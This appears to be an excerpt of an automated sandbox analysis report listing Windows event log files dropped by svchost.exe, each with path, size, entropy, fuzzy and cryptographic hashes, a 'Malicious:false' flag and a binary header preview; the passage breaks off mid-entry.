                                                      MD5:0C63074367EB5912D1369160BE13D49C
                                                      SHA1:68E877CAB4808ADE17B417228BBCF54B40FFE17A
                                                      SHA-256:7DC3C2F901D6C8EFF78E6CAFF4496946402539B27A9FE10161BEBC250EA3CAE4
                                                      SHA-512:7DE89DFDD7D143C50F0C28EE675836911DE6FD7C861D25017A7362750C82C24EE8785F758D2F7B2CA10A7562B30B49F31842000994788F18B3CEE244E293CBA4
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................0.........e ......................................................................3B................l...........................=...........................................................................................................................f...............?...........................m...................M...F.......................E................................M..&...g`..g5......................o]...........X...Z..GP...............s......od......_i..**..P............%.o..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.7590316238843728
                                                      Encrypted:false
                                                      SSDEEP:384:IhP8o8Z85848V8M8g8D8R8E8T8h8p8TtP8sU8:Ic
                                                      MD5:B074238315662886E2BD70106D08A747
                                                      SHA1:5ADA158D19401565E76349FCA97489E9FB9BFA36
                                                      SHA-256:53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
                                                      SHA-512:9D35DC04CCE95541551254BCBB00B0E2E0860D9B6F69D40FBC829DA31FC3AC43690A049A432BA4D43315B80675143A6AA02C57484E7903845010A5AD9EC92D6D
                                                      Malicious:false
                                                      Preview:ElfChnk.........................................0!....H.......................................................................j........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.7512621807969166
                                                      Encrypted:false
                                                      SSDEEP:1536:GXhKUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:GXwnS
                                                      MD5:13D614B9F0C0052F70E23F561AEF8DB0
                                                      SHA1:6B662ACF83D025FEBFF82FAEF8E55A8C9925F585
                                                      SHA-256:ECEB87E73BE1FD6D62C7586A10955079D7178E613FE80800FFE3AD861CE8A41E
                                                      SHA-512:AE9F250A690D23FABE8AEF257F8D8AC93FF0D4BD05C8A1FC3E0404E13215F51AC4F699293A886FC0D7EB397A0D26D4F8864B41AD89E739888138B30CE1C517D0
                                                      Malicious:false
                                                      Preview:ElfChnk.........%...............%............E..`G..gF........................................................................................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................&B..........O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.3069197485541766
                                                      Encrypted:false
                                                      SSDEEP:768:S0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O0apPaQOan6qa6IvV1:ycEu
                                                      MD5:E6E4C860CE7DD1BB499D6A082B461B90
                                                      SHA1:11330861B23B1D29D777D9BD10619A07B6A6A9C0
                                                      SHA-256:C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
                                                      SHA-512:7393A0FF290BB3DB07E8BB9A9FA7B666CD8B686CBDAA3FED2EBD704D6E88A4D5768D104BD768E6AA533C42588C661A863E11ED9146ABD7386A2A9B4F84583406
                                                      Malicious:false
                                                      Preview:ElfChnk.........;...............;............r..@t...H......................................................................p"..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&........................................................................l..............]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):127536
                                                      Entropy (8bit):4.000608545990872
                                                      Encrypted:false
                                                      SSDEEP:768:ah0w+qLpBVi7CPME79nCxkSqPh0w+qLpBVi7CPME79nCxkSqHe:c0w+qtBVi20w+qtBVi4e
                                                      MD5:ADECFB997F941FEFCA0239F8FF7CC750
                                                      SHA1:32E6AEED405410A5BCEC540CA7D8B019417CC85C
                                                      SHA-256:C4180B31B961C7479B8A3AAB841E13B06A6B5AC8DAE1CDB7F89FCF258A70D338
                                                      SHA-512:D917A9DA07BDC78815EEA54512652AA5E57C201BECB631E31B43AABA4550DCF474448E597CE4D1C4256FC9B822BEFB2321F8BD7783FDFD482846E0669925E189
                                                      Malicious:false
                                                      Preview:ElfChnk.........#...............#........... ..............................................................................\.*f................T.......................|...=...........................................................................................................................f...............?...........................m...................M...F.......................................-...'...............&.......................................................................................**.. ............#................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.2909571978750325
                                                      Encrypted:false
                                                      SSDEEP:384:Ny2/hDGCyCkCzCRCFCNClCuC6CoC9rC6CdCsCvCkxCkC5CCCWCxCIC/CbCFC5CkG:Ny2/dm1sR
                                                      MD5:B0BF4D9EC91ABBDA5D328631B125A5C0
                                                      SHA1:E672D69127AE7C1A51046ADAA911871EC0C10ABB
                                                      SHA-256:8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
                                                      SHA-512:3132E1FCC5C8F88BD974465EA1E644CA89C2D9E041E49F8A1F48B9ACB3376F0A1042F5CB6FDFC6BE2934C4483312C35539D64DB25B892388604F9F637074BCBD
                                                      Malicious:false
                                                      Preview:ElfChnk.U.......~.......U.......~....................}/.....................................................................@..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................v..................................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.488768580471203
                                                      Encrypted:false
                                                      SSDEEP:1536:Q9YcieRoUlafdbkKKMAQ2SomvXCQv/2ketsvQPh8YzSJoh2VgPIEF6uq9GgCVRlW:Q9YcieRoUlaFbkKKMAQ2SomvXCM/2keU
                                                      MD5:E3FB1708C64D250E4D801AFB8688DF35
                                                      SHA1:8B889F0358683733257411E451A86E3A1D42159D
                                                      SHA-256:0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
                                                      SHA-512:2F5CC514B180A39E5961452A594FE5384A6369CBCB7A1CEBAC37948770A6CB999A2E2F26A32240058D5D7A335904DAF40C88F1C096D8F85907F23E9B32E79ABE
                                                      Malicious:false
                                                      Preview:ElfChnk.........$...............$.....................w.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................V...................................**................o...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.494709482922509
                                                      Encrypted:false
                                                      SSDEEP:1536:AcRFkL1TWX0gkB/J7oasEfyk2/vKlqRi/PgTZSXwyvy8fJpfrAW+Cr6SXlUr20Gy:AcRFkL1TWX0gkB/J7oasEfyk2/vKlqk6
                                                      MD5:32526484E49E60D3FAF9995A13AC2F71
                                                      SHA1:93D0E66F9A41D4FC664DABD03799CA34FE4A3219
                                                      SHA-256:18A7EFF2A12DFFD66083469060E273155F37CFA93FDBF35D07ACE2CAFEC825D4
                                                      SHA-512:882FD6184CB3CAA36AB067441983E9D4C4E6484637DB8636C111645886B17E1EE1B4C6704736E6379F50DA8540841863674D97D21898670DF6E1E8804C851F27
                                                      Malicious:false
                                                      Preview:ElfChnk.>...............>...........................(.........................................................................FX................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................A...............&...i.......~......................**......>........Q.U..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:DIY-Thermocam raw data (Lepton 2.x), scale 8448-1024, spot sensor temperature 0.000000, unit celsius, color scheme 1, calibration: offset 0.000000, slope 842246052603449135071232.000000
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.495006895073632
                                                      Encrypted:false
                                                      SSDEEP:384:PhN7s7o787l7r787a7J7z7+7N17g7n7O7g7gY7hZ7D7k7F7r7wm7NP7Y7+7fa7lX:P9vuCg
                                                      MD5:C91E3F9D54A9644A6EF8C430022B19F7
                                                      SHA1:E7DE5FB33C57B927F0F2E9071D5CAD49981AB6D5
                                                      SHA-256:6CC7E54BCE73786C2B3785A64CB383CFFC092BFD980364C44EA0DCF5212A4585
                                                      SHA-512:BB2B7E8A651B6B15A9E9230F92DF04C446DA98CA047924D0FDD107146BBA6E21AB314EEC88FE20BD3143439EFBE7E4013F01554935CA5966076126A7303C4964
                                                      Malicious:false
                                                      Preview:ElfChnk.Y.......g.......Y.......g............%...&........................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F...........................................=...............&...............................................................s.......................**......Y........................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.1499045494600955
                                                      Encrypted:false
                                                      SSDEEP:384:Dhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauind:D6Ovc0S5UyEeDgLslstY
                                                      MD5:2045FB0D54CA8F456B545859B9F9B0A8
                                                      SHA1:35854F87588C367DE32A3931E01BC71535E3F400
                                                      SHA-256:E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
                                                      SHA-512:013CAC4CBF67C9AB5D2A07E771BAF81950E5A256F379E3C2E26CC9E8E47379579470CC6FD56E93B31C4D17935713D1FC6026307427D77CBE9647139E3D73AC47
                                                      Malicious:false
                                                      Preview:ElfChnk.........;...............;...........xk...m...+.....................................................................F.~.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................6f..w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8164696340947971
                                                      Encrypted:false
                                                      SSDEEP:384:jhGuZumutu4uEu5uOuDuyb2uPu1uRu3uGuHu9/u:jr
                                                      MD5:1AB19FA472669F4334C7A9D44E94E1B3
                                                      SHA1:F71C16706CFA9930045C9A888FDB3EF46CACC5BC
                                                      SHA-256:549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
                                                      SHA-512:72F1F20CB1F2984B318E4A2AAEE11D573441A77D04C0577D24E19F89E85F1691CB29EF569BD25EBBBD313C7B9DB945DB43D52EEFC2EF33E7BEECDFB8E0BBC404
                                                      Malicious:false
                                                      Preview:ElfChnk...................................... ..x$../..........................................................................<................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................!..................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.9855903635327656
                                                      Encrypted:false
                                                      SSDEEP:384:cxNhPALAb/A0D6AKAlAfyVAQhAQueA4AIAwA0AYAwA+/AfAjrA3DA:cxN90yzXd
                                                      MD5:7BCA54AC75C7185ADFBB42B1A84F86E3
                                                      SHA1:AD91EE55A6F9F77AD871ACA9A5B59987CA679968
                                                      SHA-256:A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
                                                      SHA-512:79A04DCE951528E09F7580E797E38D58CFC556EFEC032C3E68C701D720E01CBDCA3D4F27C309D50B9096570787A0E62B2C69236D148AC9C216CB13AA05E9619F
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................P+...,...0........................................................................9.................B.......................j...=...........................................................................................................................f...............?...........................m...................M...F...........................U.......................%%......&...................................................>...........................E.......**..............o.m...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.165454452307923
                                                      Encrypted:false
                                                      SSDEEP:384:ghVpIcpBUpBxpBapB3pBEpBZpBKpBV1pBApBppBTSpBcu1pBspBlpBABpB7pB0py:gd+uXvB
                                                      MD5:B6B6F199DA64422984403D7374F32528
                                                      SHA1:980D66401DFCCF96ADDDAF22334A5CE735554E7F
                                                      SHA-256:8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
                                                      SHA-512:5B0EFBF1C57BACF347790EB5915AFCFDDDDAFA7761D94DF1341C4E79F5B16DA3FAC2C9653C3DC41B80E31EA44AE46F4FC95C6EC0FFA0A0D3C05C69CED6955DE4
                                                      Malicious:false
                                                      Preview:ElfChnk.........'...............'...........P.......H:Z.....................................................................gO.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................f..................................**..............m.................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.8519554794255333
                                                      Encrypted:false
                                                      SSDEEP:384:WhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBZ:WwDoh1VqKVvcVU
                                                      MD5:4140628CA3CEC29C0B506CEEBDF684F6
                                                      SHA1:A2B70496C8E91D8E78AA04976B25D850ABAC6E1C
                                                      SHA-256:1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
                                                      SHA-512:779A04771A8E9B2F501FE1251F0D56C5B5988911F6067082D84FF1DBCF5D9281E32DF6CC2C995843EA1FCED748548DC116706E0F738B6510B47C2B3A0EBAA126
                                                      Malicious:false
                                                      Preview:ElfChnk.\...............\.......................0..../........................................................................v................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.1642919553794224
                                                      Encrypted:false
                                                      SSDEEP:384:bhwCCRzCaCkClCzCYC/CyCVCGCMCvCNCACCxC/CLCoiC:bKFb
                                                      MD5:D7EECF043241FDB9486580582E208603
                                                      SHA1:045D5672A8E9884B78CD31C52D372375503CBF4F
                                                      SHA-256:6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
                                                      SHA-512:6738CD1D4081AD78CCC1E3E7AC46A394D9AC32906B4688E34DCCBBA42153FB826484C854F42FFF619DC8D50CAE708585B422F3EAA3A0219AAD19DC0962910125
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................02..h6...u'.....................................................................1..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................V2............................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):75320
                                                      Entropy (8bit):4.584265380899182
                                                      Encrypted:false
                                                      SSDEEP:768:4drIZi8Ns5iLV8gRai8ZijiTEOmGkoeiDpbfdd:qa+Jao7mce8pBd
                                                      MD5:B418F9EC509AB0283BEAF4F4DB0E9E65
                                                      SHA1:BC1905B1FE88288918F67F109F029DF6937CA8AD
                                                      SHA-256:5F78426DACF50FF53B9F022B570A9B3EBB881DD26650FFD5CC1407BA239DC5AD
                                                      SHA-512:85A0DCA4F3A526D9F65C1C217F30519678F380E856BB27D37EBF58708192B0A24A4DD830576F2513AE1F95B150C371861DE6A1DF3294A0D012DDDEC70B01C302
                                                      Malicious:false
                                                      Preview:ElfChnk.........................................h ...L.......................................................................b..........................................4...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..0...........5.S...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.1786182773625786
                                                      Encrypted:false
                                                      SSDEEP:384:dhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmNUmtUmxUm01Um:dY7Lx
                                                      MD5:BB8FF89438923392DAE2BB7134E1FE2E
                                                      SHA1:79A4A32180C3CB2C65B2B14B716871D23BE51F0A
                                                      SHA-256:550E9A50F7CC7479B86E5429D1FD4EC5AC24E3182FB9A54C9A76F9878A1DBBB5
                                                      SHA-512:B408420BEEDA26E48BF8699FC64A87E95848058216B482531F89F809DF58E49135F33DD66B50E41E02C80EA39256394C26F80014A2B632C8D26BBEEC9A224801
                                                      Malicious:false
                                                      Preview:ElfChnk....................................../..(4..........................................................................F.T................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&..................................................................................../..................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.20396616148121466
                                                      Encrypted:false
                                                      SSDEEP:48:MICW4VbrP+MZQNRBEZWTENO4bpBkoFlf/6FgVt:krKNVaO80orf/6Fg
                                                      MD5:5B246B6936E1BEF6FF1CC58CE61AA137
                                                      SHA1:34DAFA59311D0BAD123A571B43D487CC0041A9C3
                                                      SHA-256:0B29ED316F526B0BEA0481B6AF85248E71AEDBEDDEBA79B2BE12B965E925BCB7
                                                      SHA-512:8EBFA19BDA6B7C2A64A539DFA9323E766EF04680BB163FC71FB33DBB72041A133489870A3CA82AFE5AED633ABB4AA13F29CA44D25B2A99C9FB14946655B7F358
                                                      Malicious:false
                                                      Preview:ElfChnk...............................................L......................................................................................... .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**................H...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.6469884746870727
                                                      Encrypted:false
                                                      SSDEEP:384:/hpivNiGiriPiYiriDfiS83i0iGiTiYiUisiuiZi+iTiciUiQiJiUiBi4i/iAixQ:/G7t8H
                                                      MD5:FC81D9FBA555C6BC7223594B8F6B46DE
                                                      SHA1:971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C
